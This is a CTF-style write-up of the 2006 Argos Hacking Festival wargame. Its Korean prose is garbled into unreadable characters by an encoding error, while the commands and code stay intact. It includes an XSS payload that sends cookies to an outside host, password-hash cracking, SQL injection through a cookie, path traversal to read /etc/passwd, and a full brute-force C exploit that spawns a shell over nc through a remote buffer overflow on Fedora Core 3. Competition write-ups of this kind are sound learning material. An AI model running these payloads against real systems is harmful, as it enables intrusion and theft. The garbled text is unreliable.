-----------------------------------
Argos Hacking Festival 0x7d6 rEpOrT
-----------------------------------

# whoami
iD        |  hkpco( madog )
nAmE      |  Park Chan-Am
mAiL&MsN  |  hkpco@korea.com
tEaM      |  wowhacker & wowcode
hOmEpAgE  |  http://hkpco.kr/


/ contents /
=============================================
level1 ~ level8
	one page, many hole

level9
	reverse engineering

level10
	web server vulnerability
	fedora core 3 remote bufferoverflow
=============================================



level!

Notice Խǿ `Really Simple Syndication`̶ Խñ ϳ ֽϴ.
̴ rss ڷ Խñ  WhereΰͰ ؼ rss 丮    ֽϴ.
Ʒ ּҷ  丮  Ǹ ahf2006.xml̶  ϳ   ֽϴ.

http://168.188.130.242/ahf2006/rss/

 ŬϿ  Hint  defcon ǥ web2.0 Feed Injection ũ Ǿ ֽϴ.
κ    ̿Ͽ Ѵٰ    ִµ ̴ ӼԴϴ.
ҽ⸦ ϸ   Ư ּҸ  iframeױ׸ ϰ ִ°   ֽϴ.

<iframe src=./rss_password width=0 height=0>

http://168.188.130.242/ahf2006/main/rss_password ּҷ ϸ ģϰ н带 ˷ݴϴ.

մϴ! level1 Դϴ!
н 'RssAtomFeedInjection' Դϴ.





level@

Community Խ xssԴϴ.
  xss ϸ ȵǰ ڰ     ۼϿ մϴ.
  Ϲ xssڵ  ϴ.

<script>document.location="http://hkpco.joinc.co.kr/query.php?query=" + document.cookie</script>

 ٷȴٰ  Ű Ȯϸ

NAME=GUEST; PHPSESSID=348bdcc25a0358cbfa3c09df7121d0b7; level2_password=Social_is_the_best_hacking

н Social_is_the_best_hacking





level#

ҽ⸦ ϸ default.css  Ǿ ϴ.
캸,   url importǾ ֽϴ.

@import url("./ahf2006.css");

̸ 80 Ʈ ûغ Ʒ ϴ.

[hkpco@ns ahf]$ telnet 168.188.130.242 80
Trying 168.188.130.242...
Connected to 168.188.130.242.
Escape character is '^]'.
GET http://168.188.130.242/ahf2006/css/ahf2006.css HTTP/1.0

HTTP/1.1 200 OK
Date: Thu, 15 Feb 2007 14:47:02 GMT
Server: Apache/1.3.36 (Unix) PHP/4.4.2
Last-Modified: Tue, 13 Feb 2007 21:11:24 GMT
ETag: "8202c3-2f-45d2297c"
Accept-Ranges: bytes
Content-Length: 47
Connection: close
Content-Type: text/css

<img src="./secret.php" width="0" height ="0">
Connection closed by foreign host.

secret.php  ϸ,

http://168.188.130.242/ahf2006/css/secret.php
ϵ帳ϴ! ̰ 峭 ƴϽñ :)
level3 н 'css_import_faked' Դϴ.





level$

ҽ⸦  ϸ <embed src=http://168.188.130.242/~admin/head_00.swf">  ±׸   ֽϴ.
admin̶  ÷ ÷ ϴ°   ֽϴ.

⼭  ߸ Ͽ http://168.188.130.242/~admin/admin/    ãҰ,
admin̶ ̵ ãƳ bruteforceα׷ ̿Ͽ  ȿ ϴ.
ݻغ н ߴµ Ƹ  Ƽ ׷ ϴ.

admin̶  .bash_historyϿ ۾   Դϴ.
http://168.188.130.242/~admin/.bash_history

  ۾ Դϴ.
/usr/local/apache/bin/htpasswd -c /home/admin/public_html/auth admin
/usr/local/apache/bin/apachectl restart

http://168.188.130.242/~admin/auth  Ͽ ,

admin:8G.C0m9ZnM8JQ
// admin password is admin123 :)

admin н admin123̶    ֽϴ.

ȹ id/pw ̿Ͽ Ͽ 

Ƹ  ȸ x15kangx  载⸦ Ѵ. 
մϴ! level4 н 'qhrrheostm_qotmfrl' Դϴ.





level%

introduce Ƹ Ұ ɴϴ.
 ߰߰ <b> ̿Ͽ  ĺ ϰ ǥ   ֽϴ.
ҽ⸦ ϸ  ڸ  ã  ִµ ̸ غ google ɴϴ.
badboys Խ ã Ͽ google̶ ܾ  Ͽ ۰˻    ֽϴ.
Ʒ  ۷ ˻ϸ

badboys site:argos.or.kr
http://argos.or.kr/bbs/zboard.php?id=badboys  ּҸ   ֽϴ.

AHF õ Խñ о,

 Ÿ  ٴٸ ǳʿô  ̽ϴ.

 ûϽ κ Խ Ƹ ܺηδ ũ ϰ,
ο ߴ "庸" ԽԴϴ.

! Ͻô° 帮ڽϴ.

level5 н 'GoogleDork@badboys' Դϴ. 

մϴ.





level^

index.php ɾ ִ flash action script  Ͽ 80Ʈ ûϸ    ֽϴ.

[hkpco@ns hkpco]$ telnet 168.188.130.242 80
Trying 168.188.130.242...
Connected to 168.188.130.242.
Escape character is '^]'.
GET /index.php HTTP/1.0

<font color=#ffffff><small>մϴ! level6 Դϴ!</small></font>
<br><font color=#ffffff><small>н HackTheFlashActionScript Դϴ.</small></font>
<script>self.location='http://168.188.130.242/ahf2006/';</script>
Connection closed by foreign host.





level&

gif SteganographyԴϴ.
װ빮 н ش  ҽ⸦     ֽϴ.( passwd: fbthdms )
introduction ִ badboys.gif  HIP(Hide In Picture)̶ α׷   Ʒ ϴ.

\x30\x31\x30
\x20\x2D\x20
\x36\x34\x37\x39
\x20\x2D\x20
\x36\x39\x38\x38
\x20
\x63\x61\x6c\x6c
\x20
\x6d\x65

̸ ڷ Ÿ 

[hkpco@ns ahf]$ hk \x30\x31\x30\x20\x2D\x20\x36\x34\x37\x39\x20\x2D\x20\x36\x39\x38\x38\x20\x63\x61\x6c\x6c\x20\x6d\x65 \x
010 - **** - 6988 call me

 ȭȣ йȣ   ں ""  ֽʴϴ.
, wjehahffkdy()





levcel*

ADMINPAGE  ϸ  ٰ ϴ.
 Ű  NAME=GUEST Ǿֽϴ.
NAME=ADMIN    `ڴ  `  ְ ``̶ ڰ  Ǿ ֽϴ.
Ű  sql injection    ִµ,   Ű ٲپ  ϴ.

NAME='or 1=1#

  ȸ ǰ  Ȥϴ    ġ  ʴ   ݴϴ.
  ˾Ƶ  ϴ.     ߽ϴ.
 manlikessexygirl





level(

AHF2006.exe   ϳ ־ϴ.
Ѻ 2006 ڸ MessageBox ̿Ͽ ݴϴ.
 ϸ ̶ ϴµ ̸  Ϸ 2006 ͸  ־ մϴ.
 츮     ϴ.
ollydbg    캸ڽϴ.

004014F4   . C74424 20 2100>MOV DWORD PTR SS:[ESP+20],21
004014FC   . 894424 24      MOV DWORD PTR SS:[ESP+24],EAX
00401500   . C74424 28 3B00>MOV DWORD PTR SS:[ESP+28],3B
00401508   . 897C24 2C      MOV DWORD PTR SS:[ESP+2C],EDI
0040150C   . C74424 30 4D00>MOV DWORD PTR SS:[ESP+30],4D
00401514   . C74424 34 5000>MOV DWORD PTR SS:[ESP+34],50
.
.
.
00406663   . C78424 441F000>MOV DWORD PTR SS:[ESP+1F44],41
0040666E   . C78424 4C1F000>MOV DWORD PTR SS:[ESP+1F4C],14
00406679   . 898C24 501F000>MOV DWORD PTR SS:[ESP+1F50],ECX
00406680   . 899C24 541F000>MOV DWORD PTR SS:[ESP+1F54],EBX
00406687   . C78424 581F000>MOV DWORD PTR SS:[ESP+1F58],45

ESP+20 ~ ESP+1F44 , 4Ʈ    2006 ڸ Ҵմϴ.


Ʒ ڵ尡  ߿մϴ.

004066EA   . 33FF           XOR EDI,EDI
004066F4   . 33C0           XOR EAX,EAX                              ;  AHF2006.00430414
004066F6   . 8D7424 20      LEA ESI,DWORD PTR SS:[ESP+20]
004066FA   > 8B2E           MOV EBP,DWORD PTR DS:[ESI]
004066FC   . 03FD           ADD EDI,EBP
004066FE   . 40             INC EAX
004066FF   . 894424 1C      MOV DWORD PTR SS:[ESP+1C],EAX
.
.
.
00406750     E8 B67A0100    CALL AHF2006.0041E20B
00406755   . 8B4424 1C      MOV EAX,DWORD PTR SS:[ESP+1C]
00406759   . 83C6 04        ADD ESI,4
0040675C   . 3D D6070000    CMP EAX,7D6
00406761    ^7C 97          JL SHORT AHF2006.004066FA

eax 0 ʱȭ ѵ, 2006  ù° (ESP+20) ESI ְ ó ϰ
004066FA ~ 00406761 ̿  ϴ.

ESP+20 ּҰ ESI Ҵϰ ESI  EBP ̵մϴ.
׸ ʱȭ EDI EBP ѵ   0 EAX 1 ŵϴ.
EAXʹ ٸ κп ϹǷ ESP+1C Ͽ Ӵϴ.

CALL AHF2006.0041E20B MessageBoxԼ ̿Ͽ n° ڸ ִ κԴϴ.
׸ Ʊ Ǿ ESP+1C(EAX) ٽ EAX ̵Ų , ESI +4 մϴ.
EAX 0x7d6(10 2006)    EAX  004066FA մϴ.
ESI +4 ϴ  int 迭 2006 ڸ ҴϿµ    4Ʈ ̱ Դϴ.

 ƾ  ᱹ EDIͿ 2006 ڸ    ִٴ    ֽϴ.
 MessageBoxԼ  2006 ͸ ľ մϴ.
 û ŷο ֱ Ͽ MessageBox ȣϴ call  ϴ.

0041E20B ּҷ ̵ϰ Ǹ  Ʒκп MessageBoxԼ  Ű  κ ֽϴ.

0041E229     FF7424 10            PUSH DWORD PTR SS:[ESP+10]                             ; /Style
0041E22D     50                   PUSH EAX                                               ; |Title
0041E22E     FF7424 10            PUSH DWORD PTR SS:[ESP+10]                             ; |Text
0041E232     51                   PUSH ECX                                               ; |hOwner
0041E233     FF15 08744200        CALL DWORD PTR DS:[<&USER32.MessageBoxA>]              ; \MessageBoxA

̸  NOP äְ  

00406763   . 8D4C24 14            LEA ECX,DWORD PTR SS:[ESP+14]

κп breakpoint ɾ  α׷  Ű Ǹ EDIͿ 00018426    ˴ϴ.

̸ 10 Ÿ 99366
׷Ƿ  99366





level)

8080Ʈ   ־ϴ.

-> GET request_file

   û Ǹ Ͼտ ڵ . ڰ ߰Ǿϴ.

 ̸ Է  ڵ index.html ûϰ ˴ϴ.

../  Ͽ  ο ִ ϵ     ֽϴ.

  /etc/passwd ûմϴ.

[hkpco@ns ahf]$ telnet 168.188.130.249 8080
Trying 168.188.130.249...
Connected to 168.188.130.249.
Escape character is '^]'.
GET ./../../../../../etc/shadow

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
htt:x:100:101:IIIMF Htt:/usr/lib/im:/sbin/nologin
x15kangx:x:500:500:Jun-Hee:/home/x15kangx:/bin/bash
choco1435:x:501:501::/home/choco1435:/bin/bash
mysql:x:502:502:Mysql_server:/usr/local/mysql:/bin/nologin
thanatos:x:503:503::/home/thanatos:/bin/bash
exso:x:504:504::/home/exso:/bin/bash
ssabro:x:505:505::/home/ssabro:/bin/bash
jerasordy:x:506:506::/home/jerasordy:/bin/bash
laidback_girl:x:507:507::/home/laidback_girl:/bin/bash
llplatinumll:x:508:508::/home/llplatinumll:/bin/bash


  index.html   , ʽ   level10 Ǯϴµ ʿ    ־ϴ.

[hkpco@ns ahf]$ telnet 168.188.130.249 8080
Trying 168.188.130.249...
Connected to 168.188.130.249.
Escape character is '^]'.
GET ./../../../../../home/x15kangx/public_html/index.html

<html>
<body>

{<text variable, no debug info>} 0xd2d780 <system>
ret: 8049a5a

մϴ.   ʽ  Դϴ.^^
ã̳׿?^^

post 'level'׸ bonus ٲٰ ϼ.

http://168.188.130.243/ahf2006/main/level_auth_action.php


BonusPasswd: Yap!!

</body>
</html>

ʽ    , ⼭  retcodeּҿ systemּҸ ̿Ͽ   Ͽ մϴ.
 ִ  GET  û Ͼ BufferOverFlow Դϴ.
fedora core3 remote bof  ϰڽϴ.

 縦 غ   Fedora core 3 ̾,    Ǵ ( ~sfp ) ߽ϴ.
retcode ּҸ Ű systemԼ ڰ ebp ִ shɾ     bruteforce õմϴ.

[hkpco@ns ahf]$ cat brute.c
#include <stdio.h>
#include <unistd.h>

int main( void )
{
	int c=0,i=0,d;
	char cmd[1024]={0x00,};

	for( ; c<31 ; c++ , i++ )
	{
		printf( "%d\n" , i );
		sprintf( cmd , "(perl -e \'print \"GET \", \"a\"x381, \";sh\",
				 \"\\x5a\\x9a\\x04\\x08\"x%d,
				 \"\\x80\\xd7\\xd2\\x00\",
				 \"\\r\\n\\r\\n\"\';cat) | nc 168.188.130.249 8080" , c );
		printf( "%s\n" , cmd );
		system( cmd );
        }
        printf( "bye.\n" );
}

[hkpco@ns ahf]$ ./brute
0
(perl -e 'print "GET ","a"x381,";sh","\x5a\x9a\x04\x08"x0,"\x80\xd7\xd2\x00","\r\n\r\n"';cat)|nc 168.188.130.249 8080

1
(perl -e 'print "GET ","a"x381,";sh","\x5a\x9a\x04\x08"x1,"\x80\xd7\xd2\x00","\r\n\r\n"';cat)|nc 168.188.130.249 8080

2
(perl -e 'print "GET ","a"x381,";sh","\x5a\x9a\x04\x08"x2,"\x80\xd7\xd2\x00","\r\n\r\n"';cat)|nc 168.188.130.249 8080

3
(perl -e 'print "GET ","a"x381,";sh","\x5a\x9a\x04\x08"x3,"\x80\xd7\xd2\x00","\r\n\r\n"';cat)|nc 168.188.130.249 8080

.
.
.

27
(perl -e 'print "GET ","a"x381,";sh","\x5a\x9a\x04\x08"x27,"\x80\xd7\xd2\x00","\r\n\r\n"';cat)|nc 168.188.130.249 8080

28
(perl -e 'print "GET ","a"x381,";sh","\x5a\x9a\x04\x08"x28,"\x80\xd7\xd2\x00","\r\n\r\n"';cat)|nc 168.188.130.249 8080

29
(perl -e 'print "GET ","a"x381,";sh","\x5a\x9a\x04\x08"x29,"\x80\xd7\xd2\x00","\r\n\r\n"';cat)|nc 168.188.130.249 8080

30
(perl -e 'print "GET ","a"x381,";sh","\x5a\x9a\x04\x08"x30,"\x80\xd7\xd2\x00","\r\n\r\n"';cat)|nc 168.188.130.249 8080

bye.
[hkpco@ns ahf]$

  ʾ ȮϿ   ׾־ ȸ ϴ.
